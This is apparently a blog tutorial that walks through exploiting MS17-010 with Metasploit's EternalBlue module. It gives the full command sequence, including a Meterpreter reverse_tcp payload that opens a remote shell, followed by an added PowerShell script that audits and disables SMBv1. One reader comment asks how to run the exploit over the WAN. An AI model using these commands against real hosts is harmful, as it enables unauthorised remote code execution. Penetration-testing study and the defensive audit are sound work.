MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Previously we identified the MS17-010 vulnerability by scanning with Nmap and by scanning with a Metasploit auxiliary module.

In the video below we will exploit the MS17-010 vulnerability by using the EternalBlue Metasploit module which comes by default with Metasploit Framework.

Metasploit commands used in this video:
search ms17_010
This command identifies modules containing the "ms17_010" string.
use exploit/windows/smb/ms17_010_eternalblue
This command selects the "exploit/windows/smb/ms17_010_eternalblue" module.
show options
This command displays the options available for the selected module.
set processname lsass.exe
This command selects the process to inject the payload into.
set rhost <IP_Address>
This command sets the target IP address.
show payloads
This command (when executed in the module context) shows the payloads compatible with the selected module.
set payload windows/x64/meterpreter/reverse_tcp
This command selects the Meterpreter reverse_tcp payload.
set lhost <IP_Address>
This command sets the listening IP address.
exploit
This command starts the exploit process.
sysinfo
This Meterpreter command displays information about the target system (after successful exploitation, once a Meterpreter session has been established).
getuid
This Meterpreter command displays the Meterpreter user on the target.
exit
This Meterpreter command closes the current Meterpreter session.
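The command sequence above depends on the target still exposing the SMBv1 server protocol on port 445 without the MS17-010 update. As an added, defender-side example that is not part of the original post, the following PowerShell script audits a Windows host for exactly that exposure and optionally removes it. It assumes an elevated PowerShell session on Windows 8 / Server 2012 or later (where the SmbShare and NetTCPIP cmdlets used here are available); the KB number is a placeholder because the correct update differs per Windows version.

```powershell
# Added example (not from the original post): audit and mitigate SMBv1 exposure
# on a Windows host. Run from an elevated PowerShell prompt.
# Usage:  .\Check-Smb1Exposure.ps1            (audit only)
#         .\Check-Smb1Exposure.ps1 -Remediate (audit, then disable SMBv1 server)
param(
    [switch]$Remediate
)

# 1. Is the SMBv1 server protocol enabled? EternalBlue needs SMBv1 to reach the
#    vulnerable code path, so a host with it disabled is not exploitable this way.
$smbConfig = Get-SmbServerConfiguration
if ($smbConfig.EnableSMB1Protocol) {
    Write-Warning "SMBv1 server protocol is ENABLED: exposed if MS17-010 is unpatched."
} else {
    Write-Host "SMBv1 server protocol is disabled."
}

# 2. Where is SMB listening? Any non-loopback address here is reachable by the
#    'set rhost' step in the post if the network allows it.
Get-NetTCPConnection -LocalPort 445 -State Listen |
    Select-Object LocalAddress, LocalPort, OwningProcess

# 3. Is the MS17-010 update installed? <KB_NUMBER> is a placeholder: take the KB
#    for this OS version from the MS17-010 bulletin before running.
$kb = "KB<KB_NUMBER>"
if (Get-HotFix -Id $kb -ErrorAction SilentlyContinue) {
    Write-Host "$kb is installed."
} else {
    Write-Warning "$kb not found: install the MS17-010 update."
}

# 4. Mitigation (opt-in): turn off the SMBv1 server protocol. -Force suppresses
#    the confirmation prompt; existing SMBv1-only clients will lose access.
if ($Remediate -and $smbConfig.EnableSMB1Protocol) {
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    Write-Host "SMBv1 server protocol has been disabled."
}
```

Disabling SMBv1 is the mitigation that closes the attack path even on hosts that cannot be patched immediately; the patch remains the real fix, and step 3 is only a hint that the host should be checked against the bulletin, not a proof of vulnerability.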



Comments

  1. RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30). What seems to be the problem when we face this? Scanning the whole subnet, every one of them gets a timeout. Even when using the scanner, Metasploit bolds the IP with information that the IP has been breached by DoublePulsar.

    1. Seems strange ... might be worthwhile to fully update your Kali Linux installation. That will update your Metasploit installation also.

    2. Yeah, I get the RubySMB...... error too, tried several settings but the exploit can't seem to run past that point!!

  2. Need help. How do I achieve this over the WAN? I've forwarded the port and whenever I exploit it shows Handler failed to bind to my external IP.

    Your help in setting this up would really be appreciated
